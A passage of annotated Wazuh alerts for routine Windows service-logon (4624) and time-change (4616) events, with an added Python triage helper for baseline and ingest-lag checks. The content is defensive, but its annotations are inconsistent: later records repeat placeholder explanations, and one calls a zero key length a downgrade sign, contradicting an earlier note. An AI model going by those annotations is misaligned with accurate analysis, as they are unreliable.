data.win.eventdata.targetUserName: SYSTEM Account that received the new logon. Pair with targetLogonId when pivoting.
data.win.eventdata.targetDomainName: NT AUTHORITY Pseudo‑domain for built‑in identities such as SYSTEM, LOCAL SERVICE and NETWORK SERVICE.
data.win.eventdata.targetLogonId: 0x3e7 The "new" logon is the existing SYSTEM session (0x3E7); no separate session was created. Join on it to find 4672/4688/4634 for the same session on this host.
data.win.eventdata.logonType: 5 Service: the Service Control Manager started a service under its configured account. SYSTEM from services.exe is routine at boot and on service restarts; the check is whether a service was just installed (Security 4697 / System 7045) and whether the timing is explained.
data.win.eventdata.logonProcessName: Advapi Logon requested through the LogonUser API (what SCM uses), not Winlogon and not a network listener.
data.win.eventdata.authenticationPackageName: Negotiate Negotiate would choose Kerberos or NTLM, but a built‑in local account does no network authentication, so this says nothing about protocol strength here.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} All zeros: no Kerberos ticket was involved, so there is no KDC event (4768/4769) to correlate with.
data.win.eventdata.keyLength: 0 Length of the session key in bits. 0 means none was requested, which is normal for local and service logons; it is not a weak key and not a downgrade indicator. Only read it together with Package Name when the package is NTLM.
data.win.eventdata.processId: 0x304 PID (hex; 772 decimal) of the process on the endpoint that requested the logon.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe The Service Control Manager. A type 5 logon requested by anything other than services.exe is worth a look.
data.win.eventdata.impersonationLevel: %%1833 Message‑table placeholder; the rendered message resolves it to Impersonation (the token can act as the account on this machine, not across the network).
data.win.eventdata.virtualAccount: %%1843 Resolves to No: a real account, not a per‑service virtual account.
data.win.eventdata.targetLinkedLogonId: 0x0 No linked session; a non‑zero value would point at the other half of a UAC split token.
data.win.eventdata.elevatedToken: %%1842 Resolves to Yes: the token carries full administrative rights. Expected for SYSTEM.
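The five 4624 records above are the same routine event (the Service Control Manager starting a service as LocalSystem) repeated, and the useful work for an analyst is confirming that quickly and noticing when the pattern breaks. The Python below is an added example, not Wazuh code and not part of the original page. It takes alerts in the flattened data.win.system.* / data.win.eventdata.* field shape shown here, resolves the %%NNNN placeholders, checks that a Logon Type 5 was requested by services.exe from the SYSTEM session (0x3E7), measures the gap between the event's systemTime and the Wazuh alert id (ingest time), and looks for bursts of service logons on one host. The sample records are constructed from the five alerts above (only id, systemTime and eventRecordID vary); the function names, the one-hour lag threshold and the five-in-five-minutes burst window are my own assumptions.

```python
"""Triage helper for Wazuh-forwarded 4624 alerts (added example, not Wazuh code)."""
import re
from datetime import datetime, timedelta, timezone

LOGON_TYPES = {2: "Interactive", 3: "Network", 4: "Batch", 5: "Service", 7: "Unlock",
               8: "NetworkCleartext", 9: "NewCredentials", 10: "RemoteInteractive"}
# %%NNNN values index Windows' message table. 1833/1842/1843 are confirmed by the
# rendered message above; 1832 and 1834 come from Microsoft's 4624 documentation.
PLACEHOLDERS = {"%%1832": "Identification", "%%1833": "Impersonation",
                "%%1834": "Delegation", "%%1842": "Yes", "%%1843": "No"}
LOCAL_SYSTEM_SID = "S-1-5-18"
SYSTEM_LOGON_ID = 0x3E7              # fixed logon session ID of SYSTEM
MAX_INGEST_LAG = timedelta(hours=1)  # assumed threshold; tune per fleet


def _parse_system_time(s):
    # Windows writes 7 fractional digits; fromisoformat accepts at most 6.
    s = re.sub(r"(\.\d{6})\d+", r"\1", s).replace("Z", "+00:00")
    return datetime.fromisoformat(s)


def parse_alert(alert):
    """Typed view of one alert in Wazuh's flattened data.win.* field shape."""
    g = alert.get
    ph = lambda k: PLACEHOLDERS.get(g(k), g(k))  # unknown codes pass through
    return {
        "host": g("data.win.system.computer"),
        "record_id": int(g("data.win.system.eventRecordID")),
        "event_time": _parse_system_time(g("data.win.system.systemTime")),
        # a Wazuh alert id is the ingest time in epoch seconds plus a counter
        "ingest_time": datetime.fromtimestamp(float(g("id")), tz=timezone.utc),
        "logon_type": int(g("data.win.eventdata.logonType")),
        "subject_sid": g("data.win.eventdata.subjectUserSid"),
        "subject_logon_id": int(g("data.win.eventdata.subjectLogonId"), 16),
        "target_logon_id": int(g("data.win.eventdata.targetLogonId"), 16),
        "process": g("data.win.eventdata.processName").replace("\\\\", "\\"),
        "impersonation": ph("data.win.eventdata.impersonationLevel"),
        "virtual_account": ph("data.win.eventdata.virtualAccount") == "Yes",
        "elevated": ph("data.win.eventdata.elevatedToken") == "Yes",
    }


def triage(ev):
    """Findings for one parsed 4624; an empty list means it matches the SCM baseline."""
    findings = []
    exe = ev["process"].rsplit("\\", 1)[-1].lower()
    if ev["logon_type"] == 5:
        # Only the Service Control Manager, as SYSTEM in session 0x3E7, requests these.
        if exe != "services.exe":
            findings.append(f"type-5 logon requested by {exe}, not services.exe")
        if ev["subject_sid"] != LOCAL_SYSTEM_SID or ev["subject_logon_id"] != SYSTEM_LOGON_ID:
            findings.append("type-5 logon not requested from the SYSTEM session")
    lag = ev["ingest_time"] - ev["event_time"]
    if lag > MAX_INGEST_LAG:
        findings.append(f"ingest lag {lag}: order the timeline by systemTime, not alert id")
    return findings


def service_logon_bursts(events, window=timedelta(minutes=5), min_count=5):
    """Hosts with >= min_count type-5 logons inside one window. Normal right after
    boot; at any other time, ask what installed or started that many services."""
    by_host, hits = {}, {}
    for ev in events:
        if ev["logon_type"] == 5:
            by_host.setdefault(ev["host"], []).append(ev["event_time"])
    for host, times in by_host.items():
        times.sort()
        for i, start in enumerate(times):
            j = i
            while j + 1 < len(times) and times[j + 1] - start <= window:
                j += 1
            if j - i + 1 >= min_count:
                hits[host] = (start, times[j])
                break
    return hits


# Constructed sample: values copied from the five alerts above; only id,
# systemTime and eventRecordID differ between records.
_BASE = {
    "data.win.system.computer": "Attacker",
    "data.win.eventdata.subjectUserSid": "S-1-5-18",
    "data.win.eventdata.subjectLogonId": "0x3e7",
    "data.win.eventdata.targetLogonId": "0x3e7",
    "data.win.eventdata.logonType": "5",
    "data.win.eventdata.processName": r"C:\Windows\System32\services.exe",
    "data.win.eventdata.impersonationLevel": "%%1833",
    "data.win.eventdata.virtualAccount": "%%1843",
    "data.win.eventdata.elevatedToken": "%%1842",
}
SAMPLE_ALERTS = [
    dict(_BASE, id=i, **{"data.win.system.systemTime": t,
                         "data.win.system.eventRecordID": r})
    for i, t, r in [
        ("1745533926.377673", "2025-04-20T01:51:38.9779159Z", "43712"),
        ("1745533926.385011", "2025-04-20T01:51:47.2593671Z", "43718"),
        ("1745533926.392345", "2025-04-20T01:52:57.5252040Z", "43720"),
        ("1745533926.399681", "2025-04-20T01:53:07.9865975Z", "43722"),
        ("1745533926.407015", "2025-04-20T01:55:30.0318323Z", "43726"),
    ]
]
```

Running `[triage(parse_alert(a)) for a in SAMPLE_ALERTS]` on the five records yields a single finding each, the four-day ingest lag, because everything else matches the baseline; `service_logon_bursts` reports Attacker with the window 01:51:38 to 01:55:30, which is only interesting if the host was not booting at that time. Swapping the processName for anything other than services.exe produces the "not services.exe" finding, which is the signal that matters for a type 5 logon.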
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533926.407015 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing ETW provider behind every Security‑log audit event (4624, 4688, 4697 and the rest).
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} Fixed GUID of that provider; stable across Windows versions and display languages, so filter on it rather than on the name.
data.win.system.eventID: 4624 Successful logon. One of the big ones to know by heart (4624/4625/4672/4688/4697).
data.win.system.version: 3 Event schema version. Newer versions add fields (Restricted Admin Mode, Virtual Account, Elevated Token) that older parsers silently drop.
data.win.system.level: 0 Audit events carry level 0 (Log Always); success or failure is in the keywords, not here.
data.win.system.task: 12544 Task category Logon (12544). 12545 is Logoff.
data.win.system.opcode: 0 Info. Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Audit Success. Audit Failure is 0x8010000000000000; this is the bit to filter on.
data.win.system.systemTime: 2025-04-20T01:55:30.0318323Z When the event was written on the endpoint (UTC, 100‑ns precision). Order timelines by this, not by the alert id: the event is dated 2025‑04‑20, but the id (1745533926 is 2025‑04‑24T22:32Z) shows it was ingested four days later, so the agent shipped it late.
data.win.system.eventRecordID: 43726 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 PID of the process that wrote the event (normally lsass.exe for Security audits), not the process inside the event body.
data.win.system.threadID: 13300 Thread in that logging process. Forensic detail only.
data.win.system.channel: Security The Security log; 4624 lands here only when the Logon audit subcategory is enabled (success auditing is on by default).
data.win.system.computer: Attacker Hostname that generated the event. Should match agent.name; a mismatch means forwarded events.
data.win.system.severityValue: AUDIT_SUCCESS Wazuh's text form of the keywords. Security events show AUDIT_SUCCESS or AUDIT_FAILURE rather than INFO/WARNING/ERROR.
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533926.414353 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:30.0970475Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43730 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 13300 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533927.421691 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4616 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12288 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:56:00.2089499Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43745 Incremental log record number – handy for timeline order.
data.win.system.processID: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 8000 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The system time was changed.
Subject:
Security ID: S-1-5-19
Account Name: LOCAL SERVICE
Account Domain: NT AUTHORITY
Logon ID: 0x3E5
Process Information:
Process ID: 0x1c48
Name: C:\Windows\System32\svchost.exe
Previous Time: 2025-04-20T01:56:00.205999700Z
New Time: 2025-04-20T01:56:00.207016100Z
This event is generated when the system time is changed. It is normal for the Windows Time Service, which runs with System privilege, to change the system time on a regular basis. Other system time changes may be indicative of attempts to tamper with the computer." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-19 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: LOCAL SERVICE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.previousTime: 2025-04-20T01:56:00.2059997Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.newTime: 2025-04-20T01:56:00.2070161Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 0x1c48 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533927.424894 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:03.5251845Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43748 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 13300 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533927.432232 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:05.0009011Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43750 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
